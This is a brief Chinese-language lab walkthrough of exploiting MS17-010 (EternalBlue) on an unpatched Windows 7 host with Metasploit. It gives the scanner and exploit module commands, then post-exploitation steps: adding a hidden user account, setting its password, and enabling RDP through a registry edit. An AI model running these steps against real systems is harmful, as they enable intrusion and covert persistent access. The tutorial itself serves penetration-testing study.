初次利用metasploit漏洞利用框架,入侵获取win7获取权限
目标机系统:windows7,无修复补丁
目标ip地址:192.168.20.131
任务:利用ms17-010,永恒之蓝漏洞,获取目标系统控制权
1,使用metasploit前,需要开启Postgresql数据库,输入命令service Postgresql start开启服务
2,输入命令msfconsole,启动metasploit,终端界面出现msf5就是启动完成
3,首先确定利用插件目录,输入命令search ms17-010,确定扫描插件目录以便使用
可以看到,
auxiliary/scanner/smb/smb_ms17_010, 这个是扫描ms17-010确定是否有该漏洞的脚本所在目录
exploit/windows/smb/ms17_010_eternalblue ,这个是漏洞利用脚本所在目录
4,利用目录都确定之后,开始正式使用,输入use auxiliary/scanner/smb/smb_ms17_010 ,进入扫描目录
5,进入扫描目录之后,可以show options,查看扫描所需要设置的参数
6,设置参数,输入命令,set rhosts 192.168.20.131,确定扫描主机
7,输入exploit,确定目标主机存在可利用漏洞
8,既然确定可以利用了,那就不客气的搞起了,输入use exploit/windows/smb/ms17_010_eternalblue,进入ms17-010漏洞利用脚本下,set rhosts 192.168.20.131,设置好攻击主机
9,运行exploit,启动攻击,成功拿下,并直接获取了system权限
10,拿下shell之后,当然可以为所欲为,
net user $用户名 /add, 添加一个隐藏用户
net user $用户名 密码,设置隐藏用户的密码
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f,开启3389端口
11,总结
metasploit-framework不愧是做网络渗透测试的必备工具,提供了非常多的常用漏洞利用脚本方便测试人员使用,极大的节省了测试人员时间,是极好的,渗透测试人员要务必精通
完